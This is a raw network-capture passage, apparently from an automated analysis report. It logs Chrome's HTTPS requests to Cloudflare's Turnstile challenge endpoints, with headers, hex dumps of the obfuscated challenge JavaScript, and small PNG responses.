                                                            2025-01-07 20:28:56 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.1649715104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:56 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6b271e95a19cb&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:56 UTC331INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:56 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 115288
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b275cdf70f3d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30
                                                            Data Ascii: "turnstile_verifying":"Verifying...","turnstile_feedback_description":"Send%20Feedback","human_button_text":"Verify%20you%20are%20human","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 66 58 2c 67 33 2c 67 34 2c 67 35 2c 67 66 2c 67 71 2c 67 75 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 38 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 30 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 32 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 37 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 38 38 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 37 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67
                                                            Data Ascii: fX,g3,g4,g5,gf,gq,gu,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1588))/1+-parseInt(gI(840))/2*(-parseInt(gI(1592))/3)+parseInt(gI(838))/4*(parseInt(gI(857))/5)+-parseInt(gI(1788))/6*(-parseInt(gI(977))/7)+parseInt(g
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 73 28 38 33 30 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 73 28 31 34 33 33 29 5d 28 66 6b 2c 67 2c 68 2c 44 29 2c 6f 5b 68 73 28 31 37 39 30 29 5d 28 42 2c 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 73 28 38 39 32 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 73 28 31 33 33 37 29 5d 3d 3d 3d 6f 5b 68 73 28 31 30 30 38 29 5d 28 69 2c 44 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 74 29 7b 68 74 3d 68 73 2c 6f 5b 68 74 28 35 31 34 29 5d 3d 3d 3d 6f 5b 68 74 28 35 31 34 29 5d 3f 28 4f 62 6a 65 63 74 5b 68 74 28 31 32 33 32 29 5d 5b 68 74 28 35 36 35 29 5d 5b
                                                            Data Ascii: ](B),C=0;C<x[hs(830)];D=x[C],E=o[hs(1433)](fk,g,h,D),o[hs(1790)](B,E)?(F=E==='s'&&!g[hs(892)](h[D]),o[hs(1337)]===o[hs(1008)](i,D)?s(i+D,E):F||s(i+D,h[D])):s(i+D,E),C++);return j;function s(G,H,ht){ht=hs,o[ht(514)]===o[ht(514)]?(Object[ht(1232)][ht(565)][
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 77 62 6b 71 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 47 66 59 57 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6b 64 6f 73 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4b 61 59 47 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 43 75 6c 4b 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 78 6a 53 47 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 44 72 59 76 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29
                                                            Data Ascii: i){return h-i},'wbkqi':function(h,i){return h>i},'GfYWz':function(h,i){return h<<i},'kdosH':function(h,i){return h==i},'KaYGv':function(h,i){return h-i},'CulKA':function(h,i){return h<<i},'xjSGw':function(h,i){return h-i},'DrYvs':function(h,i){return h(i)
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 7a 28 31 34 37 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 7d 65 6c 73 65 20 69 66 28 64 5b 68 7a 28 31 31 37 39 29 5d 28 68 7a 28 31 34 34 37 29 2c 64 5b 68 7a 28 31 36 30 31 29 5d 29 29 72 65 74 75 72 6e 21 21 5b 5d 3b 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 68 7a 28 31 37 39 37 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 7a 28 31 33 31 35 29 5d 28 64 5b 68 7a 28 31 37 36 39 29 5d 28 48 2c 31 29 2c 4d 29 2c 64 5b 68 7a 28 38 37 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 7a 28 31 34 37 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 7a 28 31 31 32 35 29 5d 28 30
                                                            Data Ascii: 6)](I,j-1)?(I=0,G[hz(1470)](o(H)),H=0):I++,M>>=1,s++);}}else if(d[hz(1179)](hz(1447),d[hz(1601)]))return!![];else{for(M=1,s=0;d[hz(1797)](s,F);H=d[hz(1315)](d[hz(1769)](H,1),M),d[hz(876)](I,j-1)?(I=0,G[hz(1470)](o(H)),H=0):I++,M=0,s++);for(M=C[hz(1125)](0
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 7a 28 38 31 30 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 64 5b 68 7a 28 31 37 39 37 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 7a 28 31 37 39 38 29 5d 28 64 5b 68 7a 28 31 31 31 38 29 5d 28 48 2c 31 29 2c 4d 26 31 2e 36 35 29 2c 64 5b 68 7a 28 38 37 36 29 5d 28 49 2c 64 5b 68 7a 28 31 33 38 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 7a 28 31 34 37 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 64 5b 68 7a 28 31 31 36 37 29 5d 28 49 2c 6a 2d 31 29 29 7b 47 5b 68 7a 28 31 34 37 30 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20
                                                            Data Ascii: z(810)](o,H)),H=0):I++,M>>=1,s++);D--,0==D&&F++}for(M=2,s=0;d[hz(1797)](s,F);H=d[hz(1798)](d[hz(1118)](H,1),M&1.65),d[hz(876)](I,d[hz(1384)](j,1))?(I=0,G[hz(1470)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,d[hz(1167)](I,j-1)){G[hz(1470)](o(H));break}else
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 31 2c 64 5b 68 43 28 38 37 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 43 28 31 32 32 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 43 28 31 34 38 37 29 5d 28 64 5b 68 43 28 31 37 39 37 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 68 43 28 37 39 34 29 5d 28 65 2c 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 68 43 28 37 31 39 29 5d 28 27 27 29 7d 69 66 28 64 5b 68 43 28 38 37 36 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 43 28 38 39 33 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4d 29 4d 3d 64 5b 68 43 28 31 37 33 33 29 5d 28 45 2c 45 5b 68 43 28 31
                                                            Data Ascii: 1,d[hC(876)](0,H)&&(H=j,G=d[hC(1225)](o,I++)),J|=d[hC(1487)](d[hC(1797)](0,L)?1:0,F),F<<=1);s[B++]=d[hC(794)](e,J),M=B-1,x--;break;case 2:return D[hC(719)]('')}if(d[hC(876)](0,x)&&(x=Math[hC(893)](2,C),C++),s[M])M=s[M];else if(B===M)M=d[hC(1733)](E,E[hC(1
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 74 75 72 6e 20 48 21 3d 3d 47 7d 2c 6a 5b 68 48 28 31 37 35 30 29 5d 3d 68 48 28 31 32 32 34 29 2c 6a 5b 68 48 28 35 31 37 29 5d 3d 68 48 28 38 30 32 29 2c 6a 5b 68 48 28 31 32 35 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 48 28 37 35 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 48 28 36 30 33 29 5d 3d 68 48 28 31 37 33 31 29 2c 6a 5b 68 48 28 35 30 33 29 5d 3d 68 48 28 31 31 36 33 29 2c 6a 5b 68 48 28 35 39 32 29 5d 3d 68 48 28 31 32 38 34 29 2c 6a 5b 68 48 28 31 37 32 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 48 28 31 31 32 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75
                                                            Data Ascii: turn H!==G},j[hH(1750)]=hH(1224),j[hH(517)]=hH(802),j[hH(1259)]=function(G,H){return G+H},j[hH(757)]=function(G,H){return G+H},j[hH(603)]=hH(1731),j[hH(503)]=hH(1163),j[hH(592)]=hH(1284),j[hH(1725)]=function(G,H){return G+H},j[hH(1123)]=function(G,H){retu
                                                            2025-01-07 20:28:56 UTC1369INData Raw: 39 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 68 48 28 31 35 37 30 29 5d 3d 35 65 33 2c 42 5b 68 48 28 31 31 31 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 68 48 28 31 35 38 30 29 5d 28 6b 5b 68 48 28 35 39 32 29 5d 2c 68 48 28 36 30 39 29 29 2c 44 3d 7b 7d 2c 44 5b 68 48 28 31 34 34 33 29 5d 3d 67 2c 44 5b 68 48 28 31 37 37 31 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 68 48 28 37 37 33 29 5d 3d 6d 2c 44 5b 68 48 28 31 33 32 39 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 68 48 28 31 34 30 39 29 5d 28 44 29 2c 46 3d 66 6f 5b 68 48 28 37 36 35 29 5d 28 45 29 5b 68 48 28 36 35 38 29 5d 28 27 2b 27 2c 68 48 28 35 32 37 29 29 2c 42 5b 68 48 28 31 35 30 31 29 5d 28 6b 5b 68 48 28 31 37 32 35 29 5d 28 6b 5b 68 48 28 31 31 32 33 29 5d 28 27 76 5f 27 2b 65
                                                            Data Ascii: 9)](C,o,!![]),B[hH(1570)]=5e3,B[hH(1114)]=function(){},B[hH(1580)](k[hH(592)],hH(609)),D={},D[hH(1443)]=g,D[hH(1771)]=l,D.cc=h,D[hH(773)]=m,D[hH(1329)]=x,E=JSON[hH(1409)](D),F=fo[hH(765)](E)[hH(658)]('+',hH(527)),B[hH(1501)](k[hH(1725)](k[hH(1123)]('v_'+e


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.1649716104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:56 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:56 UTC240INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:56 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2766b6932d9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.1649717104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:57 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:57 UTC240INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:57 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b27a7c06f799-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.1649719104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:57 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6b271e95a19cb&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:57 UTC331INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:57 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 118971
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b27b2dfd4408-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32
